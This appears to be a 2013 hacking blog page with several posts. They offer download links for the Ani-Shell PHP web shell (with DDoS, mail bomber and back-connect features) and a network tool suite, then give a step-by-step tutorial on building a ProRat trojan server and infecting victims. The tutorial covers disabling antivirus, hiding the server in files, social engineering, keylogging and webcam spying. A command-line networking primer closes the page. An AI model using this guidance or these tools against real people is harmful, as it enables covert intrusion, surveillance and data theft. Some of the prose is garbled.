Showing posts with label HACKING TOOLS. Show all posts
Showing posts with label HACKING TOOLS. Show all posts

Tuesday, December 10, 2013

Download Ani-Shell





Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , DDoser, Back Connect , Bind Shell etc etc ! This shell has immense capabilities and have been written with some coding standards in mind for better editing and customization.

Customisation

1. Email Trace back is set to Off as default and emails will not be sent , If you are setting
this feature on make sure you change the default email address (lionaneesh@gmail.com)
 to Your email address , Please Change it before using.

2. Username and Passwords are set to lionaneesh and lionaneesh respectively , Please change them for better

security.

3. As a default Lock Mode is set to on! This should not be change unless you want your shell exposed.


Default Login

Username : lionaneesh

Password : lionaneesh


Features

    Shell
    Platform Independent
    Mass - Mailer
    Small Web-Server Fuzzer
    DDoser
    Design
    Secure Login
    Deletion of Files
    Bind Shell
    Back Connect
    Fixed Some Coding errors!
    Rename Files
    Encoded Title
    Traceback (Email Alerts)
    PHP Evaluate
    Better Command Execution (even supports older version of PHP)
    Mass Code Injector (Appender and Overwriter)
    Lock Mode Customization

Latest Version Addition

    Mail Bomber (With Less Spam detection feature)
    PHP Decoder
    Better Uploader
    Fixed some Coding errors
                                                                                                DOWNLOAD
http://binbox.io/eHn8g#Zc1scNi9
 

Net Tools 5.0 (Net Tools 5.x)






This tools is a hacker friendly. Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It's an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET.

There has a 175 tools list in one software.. Tools Content
   


















DOWNLOAD
http://binbox.io/bF6OF#XkXrWCtU
 100% Secure & Safe




Monday, December 9, 2013

Hack Computer With Prorat Tutorail

Tools made of Turkey is very unusual, this tool is used to infiltrate other people's computers. The trick is very simple and easy, we live to know the IP and port the victim's computer, then we can directly infects.

prorat download here
http://binbox.io/ciNBN#lemFO2h6


A. How to use ProRat 

1. First time we have to know in advance the IP and Port victims open. We can do it by hand or even with the help of Ports Scanner.


From the picture above we know all of the computer's IP port is active and which are open. Who will be the victims in our experiment this time is a computer with the IP 192.162.10.233.

2. The next step is we run ProRat, these tools can be downloaded at http://www.prorat.net. Before you turn the first Anti Virus (disabled), because ProRat will be detected as a virus. Though he's not harmful to your computer. After that, fill in the form the victims IP IP and port (default 5110).


When we click on the Connect button to connect the victim's computer can not, because we have not the victim's computer infection. To infect the victim's computer we first create a server that will run on the victim's computer. I click the Create button - Create ProRat Server. Then Notifications appear:


Tick ​​the option Use Proconnective Notifications and enter the IP (DNS) IP address with us. In the General Settings tab we enter the Server Port (default 5110), and Victim Name Server Password.



In the Bind with File tab we can smuggle a file that will be run jointly Server. Free file extension.


Next is the Server Extensions tab, there are several options server extension. We select the 
extension. Exe.


To make our server icon Icon Click the Server tab, select whatever icon you want.


The final step of making this server is click Create Server.



Once successful, will appear:


3. We just run the Server dikomputer victims. The trick is up to you ... want to secretly infiltrated or using Social Engineering techniques and you can also infeksikan directly on the computer (if biased sihh).
4. Once the server is successfully running on the victim's computer, then we immediately try to connect to it with our computer.
5. For the connection we can use ProConnective or directly typing in the IP address and port the victim's computer. ProConnective is innate tools of ProRat that serves as a bridge (bridge connection) between the client computer and the server computer (the victim). IP will appear on the victim if he was.



6. After successfully connecting to the victim's computer, the status of ProRat will change from Disconnected to Connected


. Well ... it's time we play. There are many things we can do on the computer to find out information from the victims such as PCs, send error message, turn off the computer, locking the mouse, open the CD-ROM or even photographing the victim's face.


8. Now we will see the PC information of victims:




From the picture above we can see the information held on the victim's computer.
9. We also can send fake error messages to the victim's computer:



10. install a keylogger


11. And most exciting is to see the face of the victims that we hack.




How exciting is not it? It's still a fraction of the usefulness ProRat many more other functions, such as the victim's hard drive formatting, mess registry, steal critical data, and so forth. However, in our discussion this time we both ends meet so, yes. Ok!
Use well yeah ...

B. Prevention Method
1. Always update your Anti-Virus to be able to detect the presence of infection ProRat. ProRat server usually detected as
Trojan.Dropper.Prorat.DZ.29, Dropped: Backdoor.Prorat.DZ.
2. Fit Anti ProRat, you can download it at www.softpedia.com / get / Antivirus / Anti-prorat.shtml.

Wednesday, November 27, 2013

Network Hacking Using Command Prompt


-: Network Hacking :-


Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)--
c:/>ping hostname.com

example:- c:/>ping www.google.com


Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.


Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It's syntax is (at command prompt)--
c:/>netstat -n



Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--
c:/>telnet hostname.com

By default telnet connects to port 23 of remote computer.
So, the complete syntax is-
c:/>telnet www.hostname.com port

example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21


Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.com
example:- c:/>tracert fbtghana.blogspot .com



Here "*    *    *    Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.

various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.

The information obtained by using tracert command can be further used to find out exact operating system running on target system.